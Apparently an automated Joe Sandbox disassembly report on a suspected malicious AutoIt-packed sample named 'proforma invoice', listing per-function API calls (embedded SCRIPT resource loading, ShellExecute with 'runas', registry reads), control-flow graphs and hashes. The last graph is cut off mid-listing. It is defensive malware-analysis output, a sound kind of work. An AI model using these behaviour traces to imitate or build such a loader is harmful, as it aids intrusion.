                  control_flow_graph 234 aa42de-aa434d call aaa961 GetVersionExW call aa6b57 239 ae3617-ae362a 234->239 240 aa4353 234->240 242 ae362b-ae362f 239->242 241 aa4355-aa4357 240->241 243 aa435d-aa43bc call aa93b2 call aa37a0 241->243 244 ae3656 241->244 245 ae3632-ae363e 242->245 246 ae3631 242->246 263 ae37df-ae37e6 243->263 264 aa43c2-aa43c4 243->264 249 ae365d-ae3660 244->249 245->242 248 ae3640-ae3642 245->248 246->245 248->241 251 ae3648-ae364f 248->251 253 aa441b-aa4435 GetCurrentProcess IsWow64Process 249->253 254 ae3666-ae36a8 249->254 251->239 252 ae3651 251->252 252->244 256 aa4437 253->256 257 aa4494-aa449a 253->257 254->253 258 ae36ae-ae36b1 254->258 260 aa443d-aa4449 256->260 257->260 261 ae36db-ae36e5 258->261 262 ae36b3-ae36bd 258->262 265 aa444f-aa445e LoadLibraryA 260->265 266 ae3824-ae3828 GetSystemInfo 260->266 270 ae36f8-ae3702 261->270 271 ae36e7-ae36f3 261->271 267 ae36bf-ae36c5 262->267 268 ae36ca-ae36d6 262->268 272 ae37e8 263->272 273 ae3806-ae3809 263->273 264->249 269 aa43ca-aa43dd 264->269 276 aa449c-aa44a6 GetSystemInfo 265->276 277 aa4460-aa446e GetProcAddress 265->277 267->253 268->253 278 ae3726-ae372f 269->278 279 aa43e3-aa43e5 269->279 281 ae3704-ae3710 270->281 282 ae3715-ae3721 270->282 271->253 280 ae37ee 272->280 274 ae380b-ae381a 273->274 275 ae37f4-ae37fc 273->275 274->280 285 ae381c-ae3822 274->285 275->273 287 aa4476-aa4478 276->287 277->276 286 aa4470-aa4474 GetNativeSystemInfo 277->286 283 ae373c-ae3748 278->283 284 ae3731-ae3737 278->284 288 aa43eb-aa43ee 279->288 289 ae374d-ae3762 279->289 280->275 281->253 282->253 283->253 284->253 285->275 286->287 292 aa447a-aa447b FreeLibrary 287->292 293 aa4481-aa4493 287->293 294 aa43f4-aa440f 288->294 295 ae3791-ae3794 288->295 290 ae376f-ae377b 289->290 291 ae3764-ae376a 289->291 290->253 291->253 292->293 297 ae3780-ae378c 294->297 298 aa4415 294->298 295->253 296 ae379a-ae37c1 295->296 299 ae37ce-ae37da 296->299 300 ae37c3-ae37c9 296->300 297->253 298->253 299->253 300->253
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00AA430D
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • GetCurrentProcess.KERNEL32(?,00B3CB64,00000000,?,?), ref: 00AA4422
                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00AA4429
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AA4454
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4466
                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00AA4474
                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AA447B
                  • GetSystemInfo.KERNEL32(?,?,?), ref: 00AA44A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                  • API String ID: 3290436268-3101561225
                  • Opcode ID: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
                  • Instruction ID: 9d279624437f9a59dd468a3096eb8b8f671cc8e033a3463b36224515468e012d
                  • Opcode Fuzzy Hash: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
                  • Instruction Fuzzy Hash: 44A1D67290A2C0FFCB11CB7D7C451997FF46B6A300B168C99E08DA7AE2DB604584DB39
                  Function 00AA42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 661 aa42a2-aa42ba CreateStreamOnHGlobal 662 aa42da-aa42dd 661->662 663 aa42bc-aa42d3 FindResourceExW 661->663 664 aa42d9 663->664 665 ae35ba-ae35c9 LoadResource 663->665 664->662 665->664 666 ae35cf-ae35dd SizeofResource 665->666 666->664 667 ae35e3-ae35ee LockResource 666->667 667->664 668 ae35f4-ae35fc 667->668 669 ae3600-ae3612 668->669 669->664
                  APIs
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42B2
                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42C9
                  • LoadResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35BE
                  • SizeofResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35D3
                  • LockResource.KERNEL32(00AA50AA,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20,?), ref: 00AE35E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                  • String ID: SCRIPT
                  • API String ID: 3051347437-3967369404
                  • Opcode ID: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
                  • Instruction ID: 8bf6c444e22d256abdaa87ce9ed5e7d40808dd2e5fdb70adfda83064cb1c797d
                  • Opcode Fuzzy Hash: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
                  • Instruction Fuzzy Hash: 43113075240701BFD7218BA5DC49F677BB9EBC9B51F244169B50297290DBB1D8048760
                  Function 00AE2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B
                    • Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B62224), ref: 00AE2C10
                  • ShellExecuteW.SHELL32(00000000,?,?,00B62224), ref: 00AE2C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                  • String ID: runas
                  • API String ID: 448630720-4000483414
                  • Opcode ID: 422ec00042ce48409cf798f04cc5a7f8c47d96f9e22675187fa93b6a0effd464
                  • Instruction ID: 4621013bce0ad0effa53d24fa8b2c74bb7742026fa94b046e506e339cc27fc7f
                  • Opcode Fuzzy Hash: 422ec00042ce48409cf798f04cc5a7f8c47d96f9e22675187fa93b6a0effd464
                  • Instruction Fuzzy Hash: 361106321083415BCB14FF68D952ABEBBA8AB97340F04486CF086571E2CF24895A9722
                  Function 00B0DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?,00AE5222), ref: 00B0DBCE
                  • GetFileAttributesW.KERNELBASE(?), ref: 00B0DBDD
                  • FindFirstFileW.KERNELBASE(?,?), ref: 00B0DBEE
                  • FindClose.KERNEL32(00000000), ref: 00B0DBFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileFind$AttributesCloseFirstlstrlen
                  • String ID:
                  • API String ID: 2695905019-0
                  • Opcode ID: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
                  • Instruction ID: d6237e7300428a8a87ecdc320c210c98e7fd97aedb3c303d7608a06a98cbc18e
                  • Opcode Fuzzy Hash: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
                  • Instruction Fuzzy Hash: FAF0A03181092057D2306FF8AC0D8AF3FACDE01334B204B42F836D20E0EFB099548A95
                  Function 00AAD730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetInputState.USER32 ref: 00AAD807
                  • timeGetTime.WINMM ref: 00AADA07
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB28
                  • TranslateMessage.USER32(?), ref: 00AADB7B
                  • DispatchMessageW.USER32(?), ref: 00AADB89
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB9F
                  • Sleep.KERNEL32(0000000A), ref: 00AADBB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                  • String ID:
                  • API String ID: 2189390790-0
                  • Opcode ID: 2d03f3d6fdeb1241c54e20d18cab092d41749da4c1eae51e0e191222adc64cb0
                  • Instruction ID: e41857696c4a8d12f39457467beacc43cfe63deed272693dab9764df1be60d84
                  • Opcode Fuzzy Hash: 2d03f3d6fdeb1241c54e20d18cab092d41749da4c1eae51e0e191222adc64cb0
                  • Instruction Fuzzy Hash: 4842BE30608245EFD729CF24C885BBABBF4BF46314F148959F596876E1DB70E884CB92
                  Function 00AA2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
                  • RegisterClassExW.USER32(00000030), ref: 00AA2D31
                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
                  • InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
                  • LoadIconW.USER32(000000A9), ref: 00AA2D85
                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                  • API String ID: 2914291525-1005189915
                  • Opcode ID: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
                  • Instruction ID: 8b4fff4dd75948aea1102ee7016bf98d3c3265bf0f0b96051fdf0ce6f642aa37
                  • Opcode Fuzzy Hash: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
                  • Instruction Fuzzy Hash: 9021D3B5911208EFDB009FE8EC49A9DBFB8FB08700F10451AEA15B72A0DBB145858FA4
                  Function 00AE065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 ae065b-ae068b call ae042f 305 ae068d-ae0698 call acf2c6 302->305 306 ae06a6-ae06b2 call ad5221 302->306 311 ae069a-ae06a1 call acf2d9 305->311 312 ae06cb-ae0714 call ae039a 306->312 313 ae06b4-ae06c9 call acf2c6 call acf2d9 306->313 320 ae097d-ae0983 311->320 322 ae0716-ae071f 312->322 323 ae0781-ae078a GetFileType 312->323 313->311 324 ae0756-ae077c GetLastError call acf2a3 322->324 325 ae0721-ae0725 322->325 326 ae078c-ae07bd GetLastError call acf2a3 CloseHandle 323->326 327 ae07d3-ae07d6 323->327 324->311 325->324 329 ae0727-ae0754 call ae039a 325->329 326->311 341 ae07c3-ae07ce call acf2d9 326->341 332 ae07df-ae07e5 327->332 333 ae07d8-ae07dd 327->333 329->323 329->324 334 ae07e9-ae0837 call ad516a 332->334 335 ae07e7 332->335 333->334 344 ae0839-ae0845 call ae05ab 334->344 345 ae0847-ae086b call ae014d 334->345 335->334 341->311 344->345 351 ae086f-ae0879 call ad86ae 344->351 352 ae087e-ae08c1 345->352 353 ae086d 345->353 351->320 354 ae08e2-ae08f0 352->354 355 ae08c3-ae08c7 352->355 353->351 358 ae097b 354->358 359 ae08f6-ae08fa 354->359 355->354 357 ae08c9-ae08dd 355->357 357->354 358->320 359->358 361 ae08fc-ae092f CloseHandle call ae039a 359->361 364 ae0963-ae0977 361->364 365 ae0931-ae095d GetLastError call acf2a3 call ad5333 361->365 364->358 365->364
                  APIs
                    • Part of subcall function 00AE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7
                  • GetLastError.KERNEL32 ref: 00AE076F
                  • __dosmaperr.LIBCMT ref: 00AE0776
                  • GetFileType.KERNELBASE(00000000), ref: 00AE0782
                  • GetLastError.KERNEL32 ref: 00AE078C
                  • __dosmaperr.LIBCMT ref: 00AE0795
                  • CloseHandle.KERNEL32(00000000), ref: 00AE07B5
                  • CloseHandle.KERNEL32(?), ref: 00AE08FF
                  • GetLastError.KERNEL32 ref: 00AE0931
                  • __dosmaperr.LIBCMT ref: 00AE0938
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
                  • Instruction ID: 75c17dfb9691f72a288282ecdf673f51a4f6c8d0f6d75bdfb99d225c41814dd3
                  • Opcode Fuzzy Hash: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
                  • Instruction Fuzzy Hash: F2A12632A141848FDF19AF68D851FAE3BB1AB06320F24015EF815EF391DB719D92CB91
                  Function 00AA344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78
                    • Part of subcall function 00AA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AA3379
                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA356A
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AE318D
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AE31CE
                  • RegCloseKey.ADVAPI32(?), ref: 00AE3210
                  • _wcslen.LIBCMT ref: 00AE3277
                  • _wcslen.LIBCMT ref: 00AE3286
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                  • API String ID: 98802146-2727554177
                  • Opcode ID: ff71614d36a150185e3785e972f94f3e27de362df4adb64591ef0ff630879145
                  • Instruction ID: 9c4f4735ee4e83ee9c41021705b752b34710a44ec541037a890d6e9d19a92306
                  • Opcode Fuzzy Hash: ff71614d36a150185e3785e972f94f3e27de362df4adb64591ef0ff630879145
                  • Instruction Fuzzy Hash: F671E6724043019ED704EF65DD869ABBBF8FF99340F41082EF589971A0EF348A88CB56
                  Function 00AA2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 00AA2B8E
                  • LoadCursorW.USER32(00000000,00007F00), ref: 00AA2B9D
                  • LoadIconW.USER32(00000063), ref: 00AA2BB3
                  • LoadIconW.USER32(000000A4), ref: 00AA2BC5
                  • LoadIconW.USER32(000000A2), ref: 00AA2BD7
                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA2BEF
                  • RegisterClassExW.USER32(?), ref: 00AA2C40
                    • Part of subcall function 00AA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
                    • Part of subcall function 00AA2CD4: RegisterClassExW.USER32(00000030), ref: 00AA2D31
                    • Part of subcall function 00AA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
                    • Part of subcall function 00AA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
                    • Part of subcall function 00AA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
                    • Part of subcall function 00AA2CD4: LoadIconW.USER32(000000A9), ref: 00AA2D85
                    • Part of subcall function 00AA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                  • String ID: #$0$AutoIt v3
                  • API String ID: 423443420-4155596026
                  • Opcode ID: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
                  • Instruction ID: 6745bcdea0cf355941a444524a92b67919b1e7ccf4d92175fec13c42ea5f620f
                  • Opcode Fuzzy Hash: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
                  • Instruction Fuzzy Hash: 65212571A00318AFDB10DFADEC45AAD7FB4FB08B50F11041AE508A76A0DBB109848FA8
                  Function 00AA3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 aa3170-aa3185 444 aa3187-aa318a 443->444 445 aa31e5-aa31e7 443->445 447 aa31eb 444->447 448 aa318c-aa3193 444->448 445->444 446 aa31e9 445->446 451 aa31d0-aa31d8 DefWindowProcW 446->451 452 ae2dfb-ae2e23 call aa18e2 call abe499 447->452 453 aa31f1-aa31f6 447->453 449 aa3199-aa319e 448->449 450 aa3265-aa326d PostQuitMessage 448->450 455 ae2e7c-ae2e90 call b0bf30 449->455 456 aa31a4-aa31a8 449->456 458 aa3219-aa321b 450->458 457 aa31de-aa31e4 451->457 486 ae2e28-ae2e2f 452->486 459 aa31f8-aa31fb 453->459 460 aa321d-aa3244 SetTimer RegisterWindowMessageW 453->460 455->458 480 ae2e96 455->480 462 aa31ae-aa31b3 456->462 463 ae2e68-ae2e77 call b0c161 456->463 458->457 466 ae2d9c-ae2d9f 459->466 467 aa3201-aa3214 KillTimer call aa30f2 call aa3c50 459->467 460->458 464 aa3246-aa3251 CreatePopupMenu 460->464 470 ae2e4d-ae2e54 462->470 471 aa31b9-aa31be 462->471 463->458 464->458 473 ae2dd7-ae2df6 MoveWindow 466->473 474 ae2da1-ae2da5 466->474 467->458 470->451 483 ae2e5a-ae2e63 call b00ad7 470->483 478 aa3253-aa3263 call aa326f 471->478 479 aa31c4-aa31ca 471->479 473->458 481 ae2dc6-ae2dd2 SetFocus 474->481 482 ae2da7-ae2daa 474->482 478->458 479->451 479->486 480->451 481->458 482->479 487 ae2db0-ae2dc1 call aa18e2 482->487 483->451 486->451 491 ae2e35-ae2e48 call aa30f2 call aa3837 486->491 487->458 491->451
                  APIs
                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AA316A,?,?), ref: 00AA31D8
                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00AA316A,?,?), ref: 00AA3204
                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA3227
                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AA316A,?,?), ref: 00AA3232
                  • CreatePopupMenu.USER32 ref: 00AA3246
                  • PostQuitMessage.USER32(00000000), ref: 00AA3267
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                  • String ID: TaskbarCreated
                  • API String ID: 129472671-2362178303
                  • Opcode ID: 0d9eb8f0e543b359339e89409c72579c1089e402e3f90e6ef04f68319790e71f
                  • Instruction ID: ba846bb20cef8c81fe2198b1a0e060ae6452bb98a14d481ff58d05f993ca311c
                  • Opcode Fuzzy Hash: 0d9eb8f0e543b359339e89409c72579c1089e402e3f90e6ef04f68319790e71f
                  • Instruction Fuzzy Hash: 24412133240204AADF141F7C9D4ABBD3AA9EB57340F144626FA1A972E1CF618E8587B1
                  Function 00AD8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 499 ad8d45-ad8d55 500 ad8d6f-ad8d71 499->500 501 ad8d57-ad8d6a call acf2c6 call acf2d9 499->501 502 ad90d9-ad90e6 call acf2c6 call acf2d9 500->502 503 ad8d77-ad8d7d 500->503 515 ad90f1 501->515 520 ad90ec call ad27ec 502->520 503->502 505 ad8d83-ad8dae 503->505 505->502 509 ad8db4-ad8dbd 505->509 513 ad8dbf-ad8dd2 call acf2c6 call acf2d9 509->513 514 ad8dd7-ad8dd9 509->514 513->520 518 ad8ddf-ad8de3 514->518 519 ad90d5-ad90d7 514->519 521 ad90f4-ad90f9 515->521 518->519 523 ad8de9-ad8ded 518->523 519->521 520->515 523->513 526 ad8def-ad8e06 523->526 528 ad8e08-ad8e0b 526->528 529 ad8e23-ad8e2c 526->529 532 ad8e0d-ad8e13 528->532 533 ad8e15-ad8e1e 528->533 530 ad8e2e-ad8e45 call acf2c6 call acf2d9 call ad27ec 529->530 531 ad8e4a-ad8e54 529->531 564 ad900c 530->564 536 ad8e5b-ad8e79 call ad3820 call ad29c8 * 2 531->536 537 ad8e56-ad8e58 531->537 532->530 532->533 534 ad8ebf-ad8ed9 533->534 539 ad8fad-ad8fb6 call adf89b 534->539 540 ad8edf-ad8eef 534->540 568 ad8e7b-ad8e91 call acf2d9 call acf2c6 536->568 569 ad8e96-ad8ebc call ad9424 536->569 537->536 551 ad9029 539->551 552 ad8fb8-ad8fca 539->552 540->539 544 ad8ef5-ad8ef7 540->544 544->539 548 ad8efd-ad8f23 544->548 548->539 553 ad8f29-ad8f3c 548->553 556 